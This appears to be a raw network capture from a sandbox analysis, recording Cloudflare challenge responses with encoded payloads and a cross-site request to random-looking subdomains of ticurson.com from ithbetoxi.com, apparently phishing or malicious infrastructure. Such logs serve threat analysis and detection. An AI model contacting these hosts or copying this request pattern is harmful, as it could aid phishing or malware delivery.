2024-10-30 15:05:52 UTC	1312	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4552 Connection: close cf-chl-out-s: F+uO3b4Wy2JwUyPqUMCTNdRO4wAPUFjkM8I54lHICWwRtMmkt3CFX7jiebhRt6wqfoP1AaxPtfrPqEPDLYdPDkwJsbYm6fFMNFoBpxIwBGhCiFellhkXc9FXvV/wL3MZDuYgIMccl1I66wBbWA6VsBG1QHazOMu2t6R1wZlARdMH+pV90tlJZyl3HaWG0PIpv6dmUyR/2/jPqnv7HDcLdtcQ8U/Cb5ndSmW8/QS33FtjyPLfun3vhJxumG6Jn5/5ouuBp8cZ2YLFvnVTyn89KbzasyAwDMGENsjXMwClm14gTYDFGGAmzjGt97eAbRVo+Jjjtr2cBuwsNJ6hMyp9EIUs0TCZcQCGexnto1tSVHvORP1R1XsqkeIUCB2n1leW7XMU7zvpKu4n6qnWcF0NyACxK6rsQHJa+NwjJssnfW+eieHBaETsVDumWZbrwDAE6tS/3XRXlSYGcb7OF/9QRadbgT77ss1F9jgywadnNUxebOKvtGmxv95Bhe+xr0c23Oh854g20nBtIFA1Vtou7qByiZHyS6lO5my/DfkkLAvDjcE9K6Ful9C5lbuHlqYd9QJQjc9FxAednpP5u+t9bPkAz7ZsiGeVdPvhKJVk5rED9Y5QHs2W9PoTRMDtpx5N/GVtqsMUrSutkQrpGyPuzH604EoPY7axn5q5OLl7JvmDdL3xYCGygbg/te5xB20zNOy0xy31U5F9bdzhETgxUt3NXKARjiFZIznA2o9k2Pl7uLPQedpqxzU1c+mZbxcPXWIrTqPl63tqPMdCll4l7jZ/4/CgsZ7GlBSyiLhNVZcFQJ8OmrGkC5Vvp9Vc0pFdeGachAMNfixDq3hY7LpjajZg0Rea94tCdQ5H3C+5xZzE2B3wPZU5bk0EXjJotleuS7ilHCaCQM9GB2S5g2X9OX01Z8YJmvmBFg/GxfOHUyrNYM2znSM938o6VICm9EQgs9et1GgWGTkdRG2mf8llO+iqMDLJkh38+JPhl9ZChlgapJ9z59 [TRUNCATED]
2024-10-30 15:05:52 UTC	233	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 63 63 4b 6e 6f 6f 51 50 2f 49 30 71 4d 65 79 54 75 2f 67 74 6d 2b 44 6d 64 6c 6b 2f 5a 32 55 44 65 4e 4c 42 53 31 73 52 45 51 38 6d 43 34 43 5a 31 36 71 63 4b 44 56 56 47 56 2f 42 51 62 61 4f 53 53 4a 56 33 49 62 31 73 46 67 6d 33 62 2f 49 67 76 6a 5a 7a 52 56 53 66 4a 50 68 39 70 2b 6a 48 6f 44 63 39 67 6c 36 67 76 77 59 67 79 6a 65 79 58 35 43 36 73 4d 3d 24 38 54 66 4a 45 35 54 42 48 2b 50 50 30 75 55 58 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 61 63 34 65 35 36 37 61 34 61 36 62 32 66 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: cf-chl-out: ccKnooQP/I0qMeyTu/gtm+Dmdlk/Z2UDeNLBS1sREQ8mC4CZ16qcKDVVGV/BQbaOSSJV3Ib1sFgm3b/IgvjZzRVSfJPh9p+jHoDc9gl6gvwYgyjeyX5C6sM=$8TfJE5TBH+PP0uUXServer: cloudflareCF-RAY: 8dac4e567a4a6b2f-DFWalt-svc: h3=":443"; ma=86400
2024-10-30 15:05:52 UTC	1193	IN	Data Raw: 63 49 74 61 54 32 6d 50 64 45 32 56 6b 6e 52 62 6d 33 74 63 56 59 79 41 67 6e 4e 6b 6f 35 2b 6f 58 70 65 45 70 33 53 69 6f 57 68 2b 69 33 36 52 68 61 52 75 68 72 47 6e 68 33 65 71 6c 33 68 37 67 4c 46 38 66 34 79 63 78 4d 4a 2b 6f 62 69 58 78 63 72 4e 69 37 36 5a 73 59 6d 55 72 4c 58 59 6f 61 4b 51 6b 74 58 61 32 5a 76 4b 33 37 32 6a 72 4e 4b 39 6d 65 48 6d 32 61 66 58 32 2b 4f 76 75 4f 2f 72 72 37 4f 79 74 4c 48 6b 32 63 72 4d 75 2f 76 57 38 62 61 33 41 41 57 36 33 64 72 54 41 67 66 39 78 2f 72 6c 41 4d 2f 61 36 65 72 38 30 78 51 4a 36 4e 6a 50 2b 52 30 57 47 2f 66 62 44 42 44 71 45 75 51 55 2b 65 45 43 38 68 72 6b 2f 68 73 62 47 7a 4c 35 49 66 34 43 37 51 49 34 42 69 49 47 44 52 73 2b 2b 7a 6a 39 45 53 4d 37 42 51 45 43 48 7a 55 70 4b 7a 6f 64 54 51 34 Data Ascii: cItaT2mPdE2VknRbm3tcVYyAgnNko5+oXpeEp3SioWh+i36RhaRuhrGnh3eql3h7gLF8f4ycxMJ+obiXxcrNi76ZsYmUrLXYoaKQktXa2ZvK372jrNK9meHm2afX2+OvuO/rr7OytLHk2crMu/vW8ba3AAW63drTAgf9x/rlAM/a6er80xQJ6NjP+R0WG/fbDBDqEuQU+eEC8hrk/hsbGzL5If4C7QI4BiIGDRs++zj9ESM7BQECHzUpKzodTQ4
2024-10-30 15:05:52 UTC	1369	IN	Data Raw: 4d 6e 68 38 41 41 58 36 76 41 51 39 65 72 6c 30 39 66 6f 36 53 44 72 38 79 4c 64 39 50 73 41 34 66 66 7a 4b 2f 37 38 2b 42 38 4e 38 67 62 39 42 67 59 48 4e 78 49 35 44 69 6f 65 4e 42 46 41 43 67 45 53 49 53 63 65 2b 53 49 69 4f 68 77 39 51 43 30 69 4b 7a 77 2b 46 46 49 4e 49 53 74 58 52 45 6b 4f 4e 30 77 36 4d 6a 6c 55 55 6a 4a 58 56 45 68 43 57 43 67 64 52 55 6c 59 5a 6a 39 4b 63 48 46 46 54 46 4a 6a 55 48 64 6f 52 30 38 7a 4f 6c 59 79 57 56 30 2f 54 49 61 41 55 56 73 2f 61 6e 64 63 5a 32 71 50 59 6f 4f 4c 53 32 4b 45 6b 47 64 70 5a 58 56 54 62 58 5a 35 55 56 2b 66 66 6d 46 2b 6c 5a 42 34 67 6f 4e 2b 69 48 36 48 5a 47 57 42 65 6f 57 30 61 6f 31 2b 72 6f 42 77 6d 71 78 38 68 59 71 39 6b 5a 75 34 69 34 7a 47 6c 72 43 54 67 4c 69 37 70 5a 58 46 6f 61 47 48 Data Ascii: Mnh8AAX6vAQ9erl09fo6SDr8yLd9PsA4ffzK/78+B8N8gb9BgYHNxI5DioeNBFACgESISce+SIiOhw9QC0iKzw+FFINIStXREkON0w6MjlUUjJXVEhCWCgdRUlYZj9KcHFFTFJjUHdoR08zOlYyWV0/TIaAUVs/andcZ2qPYoOLS2KEkGdpZXVTbXZ5UV+ffmF+lZB4goN+iH6HZGWBeoW0ao1+roBwmqx8hYq9kZu4i4zGlrCTgLi7pZXFoaGH
2024-10-30 15:05:52 UTC	1369	IN	Data Raw: 66 35 45 74 76 53 44 76 63 58 48 68 49 41 4a 65 38 41 2f 4f 4c 69 47 65 44 33 36 77 49 50 47 79 45 6e 37 4f 55 47 43 43 76 70 43 43 49 4d 44 7a 6f 54 2b 69 38 59 4e 77 4c 35 48 52 33 39 43 45 5a 4c 42 52 5a 4b 49 67 30 43 4b 52 30 4e 43 69 78 58 57 41 35 57 4f 56 77 6d 4f 30 78 66 56 55 31 52 48 44 5a 53 55 79 4a 61 4f 31 4d 6f 58 56 74 74 4b 31 31 75 5a 44 73 71 50 6d 42 48 4c 6e 6c 5a 4d 54 78 55 58 59 42 4a 53 6a 67 36 55 6c 52 75 64 56 43 4a 66 59 46 64 68 45 5a 37 54 30 75 46 6c 46 4f 54 66 35 68 4f 68 33 53 58 61 48 79 53 5a 31 4b 4f 58 47 46 75 66 4b 65 6f 63 59 42 2b 66 4a 52 33 5a 36 53 50 72 6f 64 76 6b 4b 71 58 68 34 2b 6f 74 5a 4e 38 6c 5a 75 4c 64 6e 65 35 6b 5a 2f 44 74 4c 61 61 75 59 4b 69 6e 38 79 57 72 4a 44 43 6f 70 36 55 77 73 44 44 73 Data Ascii: f5EtvSDvcXHhIAJe8A/OLiGeD36wIPGyEn7OUGCCvpCCIMDzoT+i8YNwL5HR39CEZLBRZKIg0CKR0NCixXWA5WOVwmO0xfVU1RHDZSUyJaO1MoXVttK11uZDsqPmBHLnlZMTxUXYBJSjg6UlRudVCJfYFdhEZ7T0uFlFOTf5hOh3SXaHySZ1KOXGFufKeocYB+fJR3Z6SProdvkKqXh4+otZN8lZuLdne5kZ/DtLaauYKin8yWrJDCop6UwsDDs
2024-10-30 15:05:52 UTC	621	IN	Data Raw: 77 48 2f 45 4f 37 65 37 39 4a 2f 6e 77 47 42 37 7a 48 78 2f 6e 2f 67 76 6f 45 51 55 52 45 66 55 46 45 68 4d 54 44 53 6f 77 4f 68 44 33 46 67 45 65 45 42 6e 34 47 44 73 30 49 78 34 36 4b 69 73 70 4c 53 34 72 49 6b 49 71 51 67 34 6c 4e 6b 6f 72 4e 46 52 51 4b 47 41 68 55 53 77 62 51 6b 45 77 49 54 4a 66 4e 47 78 4b 59 69 5a 68 4b 55 31 48 4b 31 5a 46 53 48 68 4f 5a 45 35 58 55 31 41 79 4f 47 39 43 55 59 5a 58 55 6c 42 6c 61 6d 64 6c 52 47 64 6e 59 45 69 45 62 6b 61 55 69 57 4e 6c 6d 58 47 63 61 58 6c 33 61 31 4a 35 61 6e 39 34 6c 32 57 49 65 36 65 62 59 59 4a 6b 67 71 42 37 73 47 31 2b 69 72 56 74 70 6f 71 70 73 33 47 4c 69 48 6d 75 66 38 47 69 6b 70 32 31 6d 70 56 2b 6f 62 4f 4b 6c 71 54 44 68 35 7a 51 78 4d 75 75 30 74 54 43 71 62 4c 54 6b 37 50 51 70 36 Data Ascii: wH/EO7e79J/nwGB7zHx/n/gvoEQUREfUFEhMTDSowOhD3FgEeEBn4GDs0Ix46KispLS4rIkIqQg4lNkorNFRQKGAhUSwbQkEwITJfNGxKYiZhKU1HK1ZFSHhOZE5XU1AyOG9CUYZXUlBlamdlRGdnYEiEbkaUiWNlmXGcaXl3a1J5an94l2WIe6ebYYJkgqB7sG1+irVtpoqps3GLiHmuf8Gikp21mpV+obOKlqTDh5zQxMuu0tTCqbLTk7PQp6

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:53 UTC	666	OUT	GET /jnstrssjpuxhbzrroeqttnijOxtCCQUhFPCWFDQZVLPWDEPANBVGIELYPIKPCLODVOA HTTP/1.1 Host: sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://rpbr.ithbetoxi.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://rpbr.ithbetoxi.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:54 UTC	871	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z9nyX6UYZgBV8xZZyG%2FEbzhCpAkbK7SJSyypIMl17QtgjXvKFhvRiYYzT0R3NUBROqE9b82l63NpbczqXPgZ1QhrZ3O1qOYyn7UjruQhd5QnOHvELQjuqWJoFXv3vUo%2BItKOB6zS3%2FCwM6VM5KoME4%2FsIkNpC60OWYwfOx8mEfb%2FFUmnP1%2FSLGMrhdZ38DIMmNSkIg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dac4e5cae026c74-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1116&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1244&delivery_rate=2569653&cwnd=251&unsent_bytes=0&cid=a108da6411880a06&ts=798&x=0"
2024-10-30 15:05:54 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2024-10-30 15:05:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0